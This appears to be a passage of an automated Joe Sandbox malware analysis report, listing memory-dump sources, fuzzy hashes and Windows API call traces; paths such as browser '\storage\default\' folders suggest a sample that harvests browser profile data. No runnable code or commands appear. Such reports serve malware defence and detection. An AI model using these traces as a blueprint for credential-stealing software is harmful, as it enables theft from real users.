                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: d3?2$1w
                                • API String ID: 0-3284953598
                                • Opcode ID: 60d6b62c284656c9d8c8ad52665b2079038d58b7142a66784c8f637ce9e81d90
                                • Instruction ID: f35eb0fadbd4f54d7eaafc1f0ef6b8c786914744ce26eb71fc937a74708ada5a
                                • Opcode Fuzzy Hash: 60d6b62c284656c9d8c8ad52665b2079038d58b7142a66784c8f637ce9e81d90
                                • Instruction Fuzzy Hash: BE5158F3E087285BE340AE2CDC8473AF7D9EB54610F1A463DDAC987344E9759A0587C2
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b7308a946c6ea18a26d4d8c7f373981001719572399e34b90b625a41b1b39659
                                • Instruction ID: d4c80c857e0c58402e9115cbd128c5d1838e0da919c2d4a662a5a8f31efe1923
                                • Opcode Fuzzy Hash: b7308a946c6ea18a26d4d8c7f373981001719572399e34b90b625a41b1b39659
                                • Instruction Fuzzy Hash: 9B5105F3A086049FF314AE1AEC4577AFBD6EFD0320F16853EDA8497744EE7948418692
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d6668b47c29f06738a60799615f6ed0ec06c0972a2fcc2a9dffcf5b186fdef16
                                • Instruction ID: 517580e7dc96d3c8a5eb7f50a116d2eaa6c274f8b16bfd812b0ffde004183b4b
                                • Opcode Fuzzy Hash: d6668b47c29f06738a60799615f6ed0ec06c0972a2fcc2a9dffcf5b186fdef16
                                • Instruction Fuzzy Hash: B55114B39182249BD3102E2CED897AABFE8EF15720F060A3DEED4D7740E635590586D3
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 05c089562f9f04b9ab97a84812e7d50b13fc70e67aa24b5f1a7920f12ec592a8
                                • Instruction ID: 7354b455a5f71d65d65f7b16531e4919f68625910e15c6fc19cb961cb779c3d8
                                • Opcode Fuzzy Hash: 05c089562f9f04b9ab97a84812e7d50b13fc70e67aa24b5f1a7920f12ec592a8
                                • Instruction Fuzzy Hash: 30512BF3F081145FF3146A29EC45B7ABBD9DB94320F1A463DEAC8D3380E93A5C148696
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b4ab77d2240785f56439e117a8a7c617883fc674255d375267ba235ad1745843
                                • Instruction ID: 69bac34b871ebdb880e4864322bbd0024ea52f81edd399e9f3d246178c1b6591
                                • Opcode Fuzzy Hash: b4ab77d2240785f56439e117a8a7c617883fc674255d375267ba235ad1745843
                                • Instruction Fuzzy Hash: 744159F3D186149BF304AE19DC417BAF7D6DB94720F1A853DEB9893380E57D9C008696
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f47fcc8edd19de74f0c3b5af00062d5703063ac1e6c964dbe36e122eb9e6fb44
                                • Instruction ID: d69d9671775e4cdcf0683ddc41504e49a32465f23b0d0b77ffc463e7d5da7b78
                                • Opcode Fuzzy Hash: f47fcc8edd19de74f0c3b5af00062d5703063ac1e6c964dbe36e122eb9e6fb44
                                • Instruction Fuzzy Hash: 8B214FB290C314AFE315BE59DC8676AF7E8FF58310F06092DEBD483710E63168008A87
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8258f7f8c350507ec60dcc7484d67634d141004a364b6fafcf58ee5baf6e0ecb
                                • Instruction ID: 056a53e596a06d371324fe73120a5846d77ff8f0000e073b51178db8c1f3b32b
                                • Opcode Fuzzy Hash: 8258f7f8c350507ec60dcc7484d67634d141004a364b6fafcf58ee5baf6e0ecb
                                • Instruction Fuzzy Hash: 4C113AB250C304AFE359BE69DC857AEB7E5FB58310F06092DD3D583610E735A4508A47
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 01008636
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100866D
                                • lstrcpy.KERNEL32(?,00000000), ref: 010086AA
                                • StrStrA.SHLWAPI(?,00D6EA18), ref: 010086CF
                                • lstrcpyn.KERNEL32(012293D0,?,00000000), ref: 010086EE
                                • lstrlen.KERNEL32(?), ref: 01008701
                                • wsprintfA.USER32 ref: 01008711
                                • lstrcpy.KERNEL32(?,?), ref: 01008727
                                • StrStrA.SHLWAPI(?,00D6EB20), ref: 01008754
                                • lstrcpy.KERNEL32(?,012293D0), ref: 010087B4
                                • StrStrA.SHLWAPI(?,00D6ECE8), ref: 010087E1
                                • lstrcpyn.KERNEL32(012293D0,?,00000000), ref: 01008800
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                • String ID: %s%s
                                • API String ID: 2672039231-3252725368
                                • Opcode ID: 6fe0ada13ceac8f477553b9eef54c412ba3c27ce2ec68e16b8fb5b42689625fa
                                • Instruction ID: 3d5b9ca86b0fd8037e3e9274ffeb441abf81844da4bc15b8f9b88ed4d5488ce7
                                • Opcode Fuzzy Hash: 6fe0ada13ceac8f477553b9eef54c412ba3c27ce2ec68e16b8fb5b42689625fa
                                • Instruction Fuzzy Hash: 48F17071900128AFDB21DF68ED4CEAE77B9EF48304F145599FA49E7244DB74AE40CBA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF1F9F
                                • lstrlen.KERNEL32(00D68980), ref: 00FF1FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00FF1FE3
                                • lstrlen.KERNEL32(01021794), ref: 00FF1FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF200E
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF2042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF204D
                                • lstrlen.KERNEL32(01021794), ref: 00FF2058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF2075
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF2081
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF20AC
                                • lstrlen.KERNEL32(?), ref: 00FF20E4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF2104
                                • lstrcat.KERNEL32(00000000,?), ref: 00FF2112
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF2139
                                • lstrlen.KERNEL32(01021794), ref: 00FF214B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF216B
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF2177
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF219D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF21A8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF21D4
                                • lstrlen.KERNEL32(?), ref: 00FF21EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF220A
                                • lstrcat.KERNEL32(00000000,?), ref: 00FF2218
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF2242
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF227F
                                • lstrlen.KERNEL32(00D6D398), ref: 00FF228D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF22B1
                                • lstrcat.KERNEL32(00000000,00D6D398), ref: 00FF22B9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF22F7
                                • lstrcat.KERNEL32(00000000), ref: 00FF2304
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF232D
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FF2356
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF2382
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF23BF
                                • DeleteFileA.KERNEL32(00000000), ref: 00FF23F7
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00FF2444
                                • FindClose.KERNEL32(00000000), ref: 00FF2453
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                • String ID:
                                • API String ID: 2857443207-0
                                • Opcode ID: 9452efb2708756a4c7bc3fe0bd0490c66574e71b134da6c6182aff5316396720
                                • Instruction ID: e4dfed190cff86889b7cd7f52bc6612d9394d83e6a94e9e9a2bdeca5b2c49e6c
                                • Opcode Fuzzy Hash: 9452efb2708756a4c7bc3fe0bd0490c66574e71b134da6c6182aff5316396720
                                • Instruction Fuzzy Hash: 6FE17E31A1021EABDB71EF64EC89ABE77B9AF04310F045024FA05E7265DB78DD41EB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01006445
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01006480
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 010064AA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010064E1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006506
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0100650E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006537
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FolderPathlstrcat
                                • String ID: \..\
                                • API String ID: 2938889746-4220915743
                                • Opcode ID: 02335284af1b35041601b9f1a7c1b8e969bb3177feff71aef330e80eb407244a
                                • Instruction ID: e7d9751a237bc29a9290d946b29a345fa426a56ca1c3613bf573490de595637a
                                • Opcode Fuzzy Hash: 02335284af1b35041601b9f1a7c1b8e969bb3177feff71aef330e80eb407244a
                                • Instruction Fuzzy Hash: D2F1C3709002199FFB72EF68DC49AAE7BFAAF04300F044168F985DB295DB39D951DB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010043A3
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010043D6
                                • lstrcpy.KERNEL32(00000000,?), ref: 010043FE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01004409
                                • lstrlen.KERNEL32(\storage\default\), ref: 01004414
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004431
                                • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0100443D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004466
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01004471
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004498
                                • lstrcpy.KERNEL32(00000000,?), ref: 010044D7
                                • lstrcat.KERNEL32(00000000,?), ref: 010044DF
                                • lstrlen.KERNEL32(01021794), ref: 010044EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004507
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01004513
                                • lstrlen.KERNEL32(.metadata-v2), ref: 0100451E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100453B
                                • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 01004547
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100456E
                                • lstrcpy.KERNEL32(00000000,?), ref: 010045A0
                                • GetFileAttributesA.KERNEL32(00000000), ref: 010045A7
                                • lstrcpy.KERNEL32(00000000,?), ref: 01004601
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100462A
                                • lstrcpy.KERNEL32(00000000,?), ref: 01004653
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100467B
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010046AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
